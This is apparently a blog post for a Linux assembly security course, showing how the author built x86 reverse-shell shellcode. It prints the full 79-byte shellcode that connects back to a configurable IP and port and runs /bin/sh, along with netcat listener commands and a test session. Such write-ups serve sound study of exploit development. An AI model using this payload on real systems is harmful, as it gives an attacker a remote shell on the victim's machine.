SLAE: Assignment 2 of 7

Assignment #2 objectives:
- Create a shell_reverse_tcp assembly shellcode which:
- Reverse connects to configured IP and Port
- Execs shell on successful connection
- IP and Port should be easily configurable
==========================================

Similar to assignment #1 where we were asked to write a bind-shell, assignment #2 focuses on the more useful reverse shell. I'll be reusing much of the code of assignment #1 for this exercise and will use it as a starting point.

DESCRIPTION
The  connect()  system call connects the socket referred to by the file descriptor sockfd to the address specified by addr.  The addrlen  argument  specifies the size of addr.  The format of the address in addr is determined by the address space of the socket sockfd; see socket(2) for further details.

Note: In summary, this is what we need to do to create a reverse shell:
- create socket
- connect to a remote IP and remote port
- Pass /bin/sh to new client socket using execve

Note: We'll modify the existing bindshell.nasm code from assignment #1 as follows:

Note: We compile the assembly code and test it:

Note: We start a netcat listener in a new window:

Note: We can now start the file as follows:

Note: We successfully receive a connection on our listener, and we can enter commands:
slae@slae-VirtualBox:~$ nc -nlv 5555
Connection from 127.0.0.1 port 5555 [tcp/*] accepted
whoami
slae

Note: The code can be optimized in a similar way as assignment 1:

Note: We grab the shellcode bytes from the assembled program:

\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80

Note: I reused the code from assignment 1, and added an option to easily set the IP

Note: We start a netcat listener in a separate window:

Note: By listening on port 1234 on all ip addresses (local IP) we set up the reverse shell:

Note: We see a successful connection in our netcat terminal:
Connection from 127.0.0.1 port 1234 [tcp/*] accepted

Note: If no listener is set up we will get a segmentation fault:

Shellcode Length:  79
Segmentation fault (core dumped)

Note: We get a segfault because we start /bin/sh in a non-existent file descriptor (no connection)

Filed under: Exclude from front page SLAE